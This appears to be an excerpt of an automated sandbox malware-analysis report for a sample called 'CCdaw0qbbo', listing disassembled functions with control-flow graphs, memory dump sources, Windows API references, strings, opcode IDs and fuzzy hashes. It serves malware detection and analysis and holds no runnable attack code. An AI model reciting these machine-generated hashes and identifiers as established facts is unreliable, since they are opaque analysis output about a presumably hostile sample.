                        • Instruction Fuzzy Hash: 15613871A042908FDB09DF78C4A55EBBFF2FF89210B14849AD486AB261D730DD46CB85
                        Function 025E098A Relevance: 2.7, Strings: 2, Instructions: 191COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 3642 25e098a-25e0991 3643 25e0997-25e099e 3642->3643 3644 25e0e95-25e0fa5 call 25e00e4 call 25e10b0 3642->3644 3643->3644 3645 25e09a4-25e09b4 3643->3645 3658 25e0fa7 3644->3658 3645->3644 3647 25e09ba-25e09c1 3645->3647 3647->3644 3648 25e09c7-25e09d6 3647->3648 3648->3644 3659 25e0fac-25e0fc1 3658->3659 3660 25e103b-25e107d call 25e00f4 3659->3660 3661 25e0fc3 3659->3661 3679 25e107f call 25e1998 3660->3679 3680 25e107f call 25e2067 3660->3680 3681 25e107f call 25e1b67 3660->3681 3682 25e107f call 25e1c61 3660->3682 3661->3658 3661->3660 3662 25e0fca-25e0ff4 3661->3662 3663 25e100a-25e1016 3661->3663 3664 25e102b-25e1036 3661->3664 3665 25e1018-25e101b 3661->3665 3666 25e0ff6-25e1008 3661->3666 3662->3659 3663->3659 3664->3659 3667 25e101d-25e1022 3665->3667 3668 25e1024 3665->3668 3666->3659 3671 25e1029 3667->3671 3668->3671 3671->3659 3677 25e1085-25e108e 3679->3677 3680->3677 3681->3677 3682->3677
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1622651703.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_25e0000_CCdaw0qbbo.jbxd
                        Similarity
                        • API ID:
                        • String ID: Tekq$Tekq
                        • API String ID: 0-2269808460
                        • Opcode ID: a6d44014a4030aefa0df9fffeab5a9581a4dab6098b49bee9b04a5dd80572a8b
                        • Instruction ID: 4652908806167a07815f0e92a1d4aab47e93f7e6a398c57edf6f4424ad6bab1d
                        • Opcode Fuzzy Hash: a6d44014a4030aefa0df9fffeab5a9581a4dab6098b49bee9b04a5dd80572a8b
                        • Instruction Fuzzy Hash: 2E614771A042908FDB09DF78C4A55EBBFF2FF89210B14849AD486AB251D775DC02CB84
                        Function 025E0A39 Relevance: 2.7, Strings: 2, Instructions: 188COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 3766 25e0a39-25e0aa5 3768 25e0aab-25e0abb 3766->3768 3769 25e0e95-25e0fa5 call 25e00e4 call 25e10b0 3766->3769 3768->3769 3770 25e0ac1-25e0ac8 3768->3770 3782 25e0fa7 3769->3782 3770->3769 3772 25e0ace-25e0add 3770->3772 3772->3769 3783 25e0fac-25e0fc1 3782->3783 3784 25e103b-25e107d call 25e00f4 3783->3784 3785 25e0fc3 3783->3785 3803 25e107f call 25e1998 3784->3803 3804 25e107f call 25e2067 3784->3804 3805 25e107f call 25e1b67 3784->3805 3806 25e107f call 25e1c61 3784->3806 3785->3782 3785->3784 3786 25e0fca-25e0ff4 3785->3786 3787 25e100a-25e1016 3785->3787 3788 25e102b-25e1036 3785->3788 3789 25e1018-25e101b 3785->3789 3790 25e0ff6-25e1008 3785->3790 3786->3783 3787->3783 3788->3783 3791 25e101d-25e1022 3789->3791 3792 25e1024 3789->3792 3790->3783 3795 25e1029 3791->3795 3792->3795 3795->3783 3801 25e1085-25e108e 3803->3801 3804->3801 3805->3801 3806->3801
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1622651703.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_25e0000_CCdaw0qbbo.jbxd
                        Similarity
                        • API ID:
                        • String ID: Tekq$Tekq
                        • API String ID: 0-2269808460
                        • Opcode ID: 564728f6d6564967326355432e34e4c618d4c2d3ec22ebfee42c8f2143b6b7d5
                        • Instruction ID: b4b3f0da10dbac0ac431fe7aeb2b9d8409801a32e6176e04809da473912e82dc
                        • Opcode Fuzzy Hash: 564728f6d6564967326355432e34e4c618d4c2d3ec22ebfee42c8f2143b6b7d5
                        • Instruction Fuzzy Hash: BF614871A042948FDB09DB78C4A56EBBFF2FF89220B14849AD496AB251D7309D05CB85
                        Function 025E0CCF Relevance: 2.7, Strings: 2, Instructions: 184COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1622651703.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_25e0000_CCdaw0qbbo.jbxd
                        Similarity
                        • API ID:
                        • String ID: Tekq$Tekq
                        • API String ID: 0-2269808460
                        • Opcode ID: f9678b52d5be7c993b165d565682c271f124ab04683cf718ed1ef910869f2e58
                        • Instruction ID: 237b87c28eaae878063b89bf809b7a997a9c121269e29a3f90f7c752e4ab3bf8
                        • Opcode Fuzzy Hash: f9678b52d5be7c993b165d565682c271f124ab04683cf718ed1ef910869f2e58
                        • Instruction Fuzzy Hash: D6616F31B041908FDB09DB7CD4A16EFBFF1FF89210B14849AD4D69B291D6749D06CB85
                        Function 025E0B31 Relevance: 2.7, Strings: 2, Instructions: 181COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1622651703.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_25e0000_CCdaw0qbbo.jbxd
                        Similarity
                        • API ID:
                        • String ID: Tekq$Tekq
                        • API String ID: 0-2269808460
                        • Opcode ID: 43cdaacc4de9b9454def480c61a0aa91bb096db986924743204594be6bcc8590
                        • Instruction ID: 516181978ee398b2792daffd01bfa9c61f9b9b3322d52bf65a4aa767ca335630
                        • Opcode Fuzzy Hash: 43cdaacc4de9b9454def480c61a0aa91bb096db986924743204594be6bcc8590
                        • Instruction Fuzzy Hash: 4E514731A042958FDB09DB7CD4A16EFBFF2FF89310B18849AD4C6AB251D6309D06CB85
                        Function 6E3668F8 Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 3325 6e3668f8-6e36690b call 6e367150 3328 6e366911-6e366933 call 6e366d40 3325->3328 3329 6e36690d-6e36690f 3325->3329 3333 6e366935-6e366978 call 6e366e0b call 6e366cc7 call 6e367123 call 6e36698d call 6e366fac call 6e36699a 3328->3333 3334 6e3669a0-6e3669b9 call 6e366fda call 6e367150 3328->3334 3330 6e36697a-6e366989 3329->3330 3333->3330 3345 6e3669ca-6e3669d1 3334->3345 3346 6e3669bb-6e3669c1 3334->3346 3349 6e3669d3-6e3669d6 3345->3349 3350 6e3669dd-6e3669f1 dllmain_raw 3345->3350 3346->3345 3348 6e3669c3-6e3669c5 3346->3348 3356 6e366aa3-6e366ab2 3348->3356 3349->3350 3352 6e3669d8-6e3669db 3349->3352 3354 6e3669f7-6e366a08 dllmain_crt_dispatch 3350->3354 3355 6e366a9a-6e366aa1 3350->3355 3357 6e366a0e-6e366a20 call 6e366040 3352->3357 3354->3355 3354->3357 3355->3356 3364 6e366a22-6e366a24 3357->3364 3365 6e366a49-6e366a4b 3357->3365 3364->3365 3366 6e366a26-6e366a44 call 6e366040 call 6e3668f8 dllmain_raw 3364->3366 3367 6e366a52-6e366a63 dllmain_crt_dispatch 3365->3367 3368 6e366a4d-6e366a50 3365->3368 3366->3365 3367->3355 3370 6e366a65-6e366a97 dllmain_raw 3367->3370 3368->3355 3368->3367 3370->3355
                        APIs
                        • __RTC_Initialize.LIBCMT ref: 6E36693F
                        • ___scrt_uninitialize_crt.LIBCMT ref: 6E366959
                        Memory Dump Source
                        • Source File: 00000000.00000002.1625162823.000000006E351000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E350000, based on PE: true
                        • Associated: 00000000.00000002.1625137216.000000006E350000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625210655.000000006E373000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625235966.000000006E37A000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625262553.000000006E397000.00000002.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6e350000_CCdaw0qbbo.jbxd
                        Yara matches
                        Similarity
                        • API ID: Initialize___scrt_uninitialize_crt
                        • String ID:
                        • API String ID: 2442719207-0
                        • Opcode ID: ea59f7e87d563ebb395bcf480ee70534e4b69e77fb9747ad73dbc6337206bde6
                        • Instruction ID: 9ac57b0d61edd6b9cdc3edb5487f28c2ea48f849d4ad390e7f4f5a84f6d9ca01
                        • Opcode Fuzzy Hash: ea59f7e87d563ebb395bcf480ee70534e4b69e77fb9747ad73dbc6337206bde6
                        • Instruction Fuzzy Hash: 5A41E5B2D24615AFDB508FF4CC40B9E3BBCEB817D8F10452AE85467248D7329D418BA0
                        Function 6E3669A8 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 3375 6e3669a8-6e3669b9 call 6e367150 3378 6e3669ca-6e3669d1 3375->3378 3379 6e3669bb-6e3669c1 3375->3379 3381 6e3669d3-6e3669d6 3378->3381 3382 6e3669dd-6e3669f1 dllmain_raw 3378->3382 3379->3378 3380 6e3669c3-6e3669c5 3379->3380 3386 6e366aa3-6e366ab2 3380->3386 3381->3382 3383 6e3669d8-6e3669db 3381->3383 3384 6e3669f7-6e366a08 dllmain_crt_dispatch 3382->3384 3385 6e366a9a-6e366aa1 3382->3385 3387 6e366a0e-6e366a20 call 6e366040 3383->3387 3384->3385 3384->3387 3385->3386 3390 6e366a22-6e366a24 3387->3390 3391 6e366a49-6e366a4b 3387->3391 3390->3391 3392 6e366a26-6e366a44 call 6e366040 call 6e3668f8 dllmain_raw 3390->3392 3393 6e366a52-6e366a63 dllmain_crt_dispatch 3391->3393 3394 6e366a4d-6e366a50 3391->3394 3392->3391 3393->3385 3396 6e366a65-6e366a97 dllmain_raw 3393->3396 3394->3385 3394->3393 3396->3385
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1625162823.000000006E351000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E350000, based on PE: true
                        • Associated: 00000000.00000002.1625137216.000000006E350000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625210655.000000006E373000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625235966.000000006E37A000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625262553.000000006E397000.00000002.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6e350000_CCdaw0qbbo.jbxd
                        Yara matches
                        Similarity
                        • API ID: dllmain_raw$dllmain_crt_dispatch
                        • String ID:
                        • API String ID: 3136044242-0
                        • Opcode ID: d3baf31e52b311b8dc3acf204791c53d7bf2794a4b6b5d72b9add88f8788b47e
                        • Instruction ID: 303c3a31557b1b1ea89cc543432906711a36e4dc5c9b9126d094da46cf3e57e9
                        • Opcode Fuzzy Hash: d3baf31e52b311b8dc3acf204791c53d7bf2794a4b6b5d72b9add88f8788b47e
                        • Instruction Fuzzy Hash: B82182B1D2461AAFDB618FF5CD40AAE3B7DEB817D8B018539E85466218D3328D018BE0
                        Function 6E3667F1 Relevance: 3.1, APIs: 2, Instructions: 76COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 3401 6e3667f1-6e3667ff call 6e367150 call 6e366e3b 3405 6e366804-6e366807 3401->3405 3406 6e3668de 3405->3406 3407 6e36680d-6e366825 call 6e366d40 3405->3407 3408 6e3668e0-6e3668ef 3406->3408 3411 6e3668f0-6e3668f7 call 6e366fda 3407->3411 3412 6e36682b-6e36683c call 6e366d9d 3407->3412 3417 6e36683e-6e366860 call 6e3670f7 call 6e366cbb call 6e366cdf call 6e3697b7 3412->3417 3418 6e36688b-6e366899 call 6e3668d4 3412->3418 3417->3418 3437 6e366862-6e366869 call 6e366d72 3417->3437 3418->3406 3423 6e36689b-6e3668a5 call 6e366fd4 3418->3423 3429 6e3668c6-6e3668cf 3423->3429 3430 6e3668a7-6e3668b0 call 6e366efb 3423->3430 3429->3408 3430->3429 3436 6e3668b2-6e3668c4 3430->3436 3436->3429 3437->3418 3441 6e36686b-6e366888 call 6e36978c 3437->3441 3441->3418
                        APIs
                        • __RTC_Initialize.LIBCMT ref: 6E36683E
                          • Part of subcall function 6E366CBB: InitializeSListHead.KERNEL32(6E396220,6E366848,6E378A90,00000010,6E3667D9,?,?,?,6E366A01,?,00000001,?,?,00000001,?,6E378AD8), ref: 6E366CC0
                        • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6E3668A8
                        Memory Dump Source
                        • Source File: 00000000.00000002.1625162823.000000006E351000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E350000, based on PE: true
                        • Associated: 00000000.00000002.1625137216.000000006E350000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625210655.000000006E373000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625235966.000000006E37A000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625262553.000000006E397000.00000002.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6e350000_CCdaw0qbbo.jbxd
                        Yara matches
                        Similarity
                        • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                        • String ID:
                        • API String ID: 3231365870-0
                        • Opcode ID: 612738717d24085d38a88100c1aea9eb5b4b43622413bc20beca39e245d189e2
                        • Instruction ID: d0a53d771de1f34164d3191705d6f2d033723e628b033ad0066e65b513cb96b6
                        • Opcode Fuzzy Hash: 612738717d24085d38a88100c1aea9eb5b4b43622413bc20beca39e245d189e2
                        • Instruction Fuzzy Hash: 5021E4326686529ADF146FF484147ED37A89F423ECF100869D4D12B2CADB274084C7A6
                        Function 6E36CE1C Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 3444 6e36ce1c-6e36ce21 3445 6e36ce23-6e36ce3b 3444->3445 3446 6e36ce3d-6e36ce41 3445->3446 3447 6e36ce49-6e36ce52 3445->3447 3446->3447 3448 6e36ce43-6e36ce47 3446->3448 3449 6e36ce64 3447->3449 3450 6e36ce54-6e36ce57 3447->3450 3451 6e36cebe-6e36cec2 3448->3451 3454 6e36ce66-6e36ce73 GetStdHandle 3449->3454 3452 6e36ce60-6e36ce62 3450->3452 3453 6e36ce59-6e36ce5e 3450->3453 3451->3445 3455 6e36cec8-6e36cecb 3451->3455 3452->3454 3453->3454 3456 6e36ce75-6e36ce77 3454->3456 3457 6e36cea0-6e36ceb2 3454->3457 3456->3457 3459 6e36ce79-6e36ce82 GetFileType 3456->3459 3457->3451 3458 6e36ceb4-6e36ceb7 3457->3458 3458->3451 3459->3457 3460 6e36ce84-6e36ce8d 3459->3460 3461 6e36ce95-6e36ce98 3460->3461 3462 6e36ce8f-6e36ce93 3460->3462 3461->3451 3463 6e36ce9a-6e36ce9e 3461->3463 3462->3451 3463->3451
                        APIs
                        • GetStdHandle.KERNEL32(000000F6), ref: 6E36CE68
                        • GetFileType.KERNELBASE(00000000), ref: 6E36CE7A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1625162823.000000006E351000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E350000, based on PE: true
                        • Associated: 00000000.00000002.1625137216.000000006E350000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625210655.000000006E373000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625235966.000000006E37A000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625262553.000000006E397000.00000002.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6e350000_CCdaw0qbbo.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileHandleType
                        • String ID:
                        • API String ID: 3000768030-0
                        • Opcode ID: b496b59d87d4a9302a0313cf1ea103b18909137a85ca0ad7909a5139029a6b67
                        • Instruction ID: 5818bff7e5a65dc8cde958901eb423bc83d42349b0dd4c314ef5a9ffba2ba5ef
                        • Opcode Fuzzy Hash: b496b59d87d4a9302a0313cf1ea103b18909137a85ca0ad7909a5139029a6b67
                        • Instruction Fuzzy Hash: 9211E471314B524ACF304EBE8998222BBB9A7C7232B34074AD0B6CF1F9C331D581D295
                        Function 025E0D23 Relevance: 2.7, Strings: 2, Instructions: 192COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 3602 25e0d23-25e0d2c 3603 25e0e95-25e0fa5 call 25e00e4 call 25e10b0 3602->3603 3604 25e0d32-25e0d45 3602->3604 3617 25e0fa7 3603->3617 3604->3603 3605 25e0d4b-25e0d61 3604->3605 3605->3603 3606 25e0d67-25e0d6b 3605->3606 3606->3603 3618 25e0fac-25e0fc1 3617->3618 3619 25e103b-25e107d call 25e00f4 3618->3619 3620 25e0fc3 3618->3620 3638 25e107f call 25e1998 3619->3638 3639 25e107f call 25e2067 3619->3639 3640 25e107f call 25e1b67 3619->3640 3641 25e107f call 25e1c61 3619->3641 3620->3617 3620->3619 3621 25e0fca-25e0ff4 3620->3621 3622 25e100a-25e1016 3620->3622 3623 25e102b-25e1036 3620->3623 3624 25e1018-25e101b 3620->3624 3625 25e0ff6-25e1008 3620->3625 3621->3618 3622->3618 3623->3618 3626 25e101d-25e1022 3624->3626 3627 25e1024 3624->3627 3625->3618 3630 25e1029 3626->3630 3627->3630 3630->3618 3636 25e1085-25e108e 3638->3636 3639->3636 3640->3636 3641->3636
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1622651703.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_25e0000_CCdaw0qbbo.jbxd
                        Similarity
                        • API ID:
                        • String ID: Tekq$Tekq
                        • API String ID: 0-2269808460
                        • Opcode ID: ba7d1001a9ac034c799b123fadc6cb6aaa9de8333e1a22d0e143869210324a0f
                        • Instruction ID: b0b8a6d0d8df59c39bff71c2b439c6bf536eca7a132f7c2df1d116c2ad705aa7
                        • Opcode Fuzzy Hash: ba7d1001a9ac034c799b123fadc6cb6aaa9de8333e1a22d0e143869210324a0f
                        • Instruction Fuzzy Hash: 48612731A041958FDB09DF7CC4A16EFBFF2FF89310B18849AD486AB252D6309D06CB95
                        Function 025E0BBB Relevance: 2.7, Strings: 2, Instructions: 184COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 3807 25e0bbb-25e0bc7 3808 25e0bcd-25e0bda 3807->3808 3809 25e0e95-25e0fa5 call 25e00e4 call 25e10b0 3807->3809 3808->3809 3810 25e0be0-25e0be7 3808->3810 3821 25e0fa7 3809->3821 3810->3809 3822 25e0fac-25e0fc1 3821->3822 3823 25e103b-25e107d call 25e00f4 3822->3823 3824 25e0fc3 3822->3824 3842 25e107f call 25e1998 3823->3842 3843 25e107f call 25e2067 3823->3843 3844 25e107f call 25e1b67 3823->3844 3845 25e107f call 25e1c61 3823->3845 3824->3821 3824->3823 3825 25e0fca-25e0ff4 3824->3825 3826 25e100a-25e1016 3824->3826 3827 25e102b-25e1036 3824->3827 3828 25e1018-25e101b 3824->3828 3829 25e0ff6-25e1008 3824->3829 3825->3822 3826->3822 3827->3822 3830 25e101d-25e1022 3828->3830 3831 25e1024 3828->3831 3829->3822 3834 25e1029 3830->3834 3831->3834 3834->3822 3840 25e1085-25e108e 3842->3840 3843->3840 3844->3840 3845->3840
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1622651703.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_25e0000_CCdaw0qbbo.jbxd
                        Similarity
                        • API ID:
                        • String ID: Tekq$Tekq
                        • API String ID: 0-2269808460
                        • Opcode ID: 12ad4fba59969a1e3c435c081c34ac05c9eb12ee1b3d53a14fd8250c34188445
                        • Instruction ID: 6e41d7758481ee47eeefabffe1a2b7221cb79d14283f82a2cfe01ccf32e7aa93
                        • Opcode Fuzzy Hash: 12ad4fba59969a1e3c435c081c34ac05c9eb12ee1b3d53a14fd8250c34188445
                        • Instruction Fuzzy Hash: BB611871A041958FDB09DB7CD4A56FFBFF2FF89310B18849AD486AB251D6349C02CB85
                        Function 025E0E19 Relevance: 2.7, Strings: 2, Instructions: 184COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1622651703.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_25e0000_CCdaw0qbbo.jbxd
                        Similarity
                        • API ID:
                        • String ID: Tekq$Tekq
                        • API String ID: 0-2269808460
                        • Opcode ID: 4fc33e08c20ad063994de858dafa5efbe0875b15afd5f2b0d5bccab6cebffaa3
                        • Instruction ID: 7d81e224bd6a077c8b19c82c8f9894784920c52e99739b4838296012b5e96fc7
                        • Opcode Fuzzy Hash: 4fc33e08c20ad063994de858dafa5efbe0875b15afd5f2b0d5bccab6cebffaa3
                        • Instruction Fuzzy Hash: 6C614A31B042918FDB09DF78D4A55EBBFF2FF85210B14849AD4D6AB251D7309D05CB85
                        Function 025E0C67 Relevance: 2.7, Strings: 2, Instructions: 184COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 3846 25e0c67-25e0c69 3847 25e0c6b 3846->3847 3848 25e0ca0-25e0ca2 3846->3848 3847->3848 3849 25e0ca8-25e0caf 3848->3849 3850 25e0e95-25e0fa5 call 25e00e4 call 25e10b0 3848->3850 3849->3850 3851 25e0cb5-25e0cc9 3849->3851 3862 25e0fa7 3850->3862 3851->3850 3863 25e0fac-25e0fc1 3862->3863 3864 25e103b-25e107d call 25e00f4 3863->3864 3865 25e0fc3 3863->3865 3883 25e107f call 25e1998 3864->3883 3884 25e107f call 25e2067 3864->3884 3885 25e107f call 25e1b67 3864->3885 3886 25e107f call 25e1c61 3864->3886 3865->3862 3865->3864 3866 25e0fca-25e0ff4 3865->3866 3867 25e100a-25e1016 3865->3867 3868 25e102b-25e1036 3865->3868 3869 25e1018-25e101b 3865->3869 3870 25e0ff6-25e1008 3865->3870 3866->3863 3867->3863 3868->3863 3871 25e101d-25e1022 3869->3871 3872 25e1024 3869->3872 3870->3863 3875 25e1029 3871->3875 3872->3875 3875->3863 3881 25e1085-25e108e 3883->3881 3884->3881 3885->3881 3886->3881
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1622651703.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_25e0000_CCdaw0qbbo.jbxd
                        Similarity
                        • API ID:
                        • String ID: Tekq$Tekq
                        • API String ID: 0-2269808460
                        • Opcode ID: 34a7eb51f0e4e25b974af4c0972d10efc905964dca29897d0d9e12425f65b0c4
                        • Instruction ID: 340ee7c483cfae513ade36c246dfb1348987e68716a14402954510ea3487c76c
                        • Opcode Fuzzy Hash: 34a7eb51f0e4e25b974af4c0972d10efc905964dca29897d0d9e12425f65b0c4
                        • Instruction Fuzzy Hash: 5F614B71B042918FDB09DB78D4A56EBBFF2FF89210B14849AD4C6AB252D7309D06CB85
                        Function 025E0AFA Relevance: 2.7, Strings: 2, Instructions: 183COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1622651703.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_25e0000_CCdaw0qbbo.jbxd
                        Similarity
                        • API ID:
                        • String ID: Tekq$Tekq
                        • API String ID: 0-2269808460
                        • Opcode ID: b49d94008f1bec1090b8c605eba500cb3acc73a35f86011687ec8d15f2d1f115
                        • Instruction ID: 4641f78c6d4dfab1012dc2704221e3e4f2b6d838db4cd2bfaf2669e9b3733565
                        • Opcode Fuzzy Hash: b49d94008f1bec1090b8c605eba500cb3acc73a35f86011687ec8d15f2d1f115
                        • Instruction Fuzzy Hash: 0D614A71B042908FDB09DF78D4A56EBBFF2FF85210B14849AD4D6AB292D7309D06CB85
                        Function 025E0A4B Relevance: 2.7, Strings: 2, Instructions: 182COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1622651703.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_25e0000_CCdaw0qbbo.jbxd
                        Similarity
                        • API ID:
                        • String ID: Tekq$Tekq
                        • API String ID: 0-2269808460
                        • Opcode ID: d9e00454b02dbd527801a263ac0c17a672f45d159935771743bcbdc1082ba4a1
                        • Instruction ID: 74905e1574c78f2f2ef8678c8b615e079a0c82184186a067f9a1109629187337
                        • Opcode Fuzzy Hash: d9e00454b02dbd527801a263ac0c17a672f45d159935771743bcbdc1082ba4a1
                        • Instruction Fuzzy Hash: 9E613A31A042918FDB09DB78D4A55EBBFF2FF89210B14849AD4C6AB261D7349D05CB85
                        Function 025E0B88 Relevance: 2.7, Strings: 2, Instructions: 182COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1622651703.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_25e0000_CCdaw0qbbo.jbxd
                        Similarity
                        • API ID:
                        • String ID: Tekq$Tekq
                        • API String ID: 0-2269808460
                        • Opcode ID: 341fe8e92b194cd10e800eb16876f5e8fdad4cd5b14c41ab29b9fbc57d370caa
                        • Instruction ID: 87bac6d17ccb91ffe50802557d607c3fedfc0c977d0142eaec994016f8ee3d4f
                        • Opcode Fuzzy Hash: 341fe8e92b194cd10e800eb16876f5e8fdad4cd5b14c41ab29b9fbc57d370caa
                        • Instruction Fuzzy Hash: B1613A31B042918FDB09DB78D4A56EBBFF2FF89210B18849AD4C6AB252D7319D05CB85
                        Function 025E0CE1 Relevance: 2.7, Strings: 2, Instructions: 182COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1622651703.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_25e0000_CCdaw0qbbo.jbxd
                        Similarity
                        • API ID:
                        • String ID: Tekq$Tekq
                        • API String ID: 0-2269808460
                        • Opcode ID: 65bcc8bb63c32e11c36d232e8b96fd55448ffcded9754925f2b7ba19b72fb53f
                        • Instruction ID: 99c621a833579545418ddfe781f02793e754267c3b569a5c7a0b771c755d33b5
                        • Opcode Fuzzy Hash: 65bcc8bb63c32e11c36d232e8b96fd55448ffcded9754925f2b7ba19b72fb53f
                        • Instruction Fuzzy Hash: 59614871A042908FDB09DB78D4A56EFBFF2FF89210B18849AD486AB251D6309D06CB85
                        Function 025E0F30 Relevance: 2.6, Strings: 2, Instructions: 112COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1622651703.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_25e0000_CCdaw0qbbo.jbxd
                        Similarity
                        • API ID:
                        • String ID: Tekq$Tekq
                        • API String ID: 0-2269808460
                        • Opcode ID: e7843922916b2aebd76b6de151fa504947c488ec3b0a58ad7c318bc9cbea4a8d
                        • Instruction ID: 2cefebf3e6dfc3491048498eeece43edc3039079276a5931a01cdb1f9d492056
                        • Opcode Fuzzy Hash: e7843922916b2aebd76b6de151fa504947c488ec3b0a58ad7c318bc9cbea4a8d
                        • Instruction Fuzzy Hash: 7341B171F001158FDB089BA9C85467FB6E6FBC8710F20846AE916EB3A4CA749D11CB95
                        Function 025E2680 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1622651703.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_25e0000_CCdaw0qbbo.jbxd
                        Similarity
                        • API ID:
                        • String ID: t<
                        • API String ID: 0-79568080
                        • Opcode ID: 1a8654914c3b5ae46491b573220752228960bdb47f3b1e9816cc12df8150d8c3
                        • Instruction ID: 89ba4ba0281563c1a3fa14cb1c60f441c995ca5b215b0b968d7beb25bf9e1d96
                        • Opcode Fuzzy Hash: 1a8654914c3b5ae46491b573220752228960bdb47f3b1e9816cc12df8150d8c3
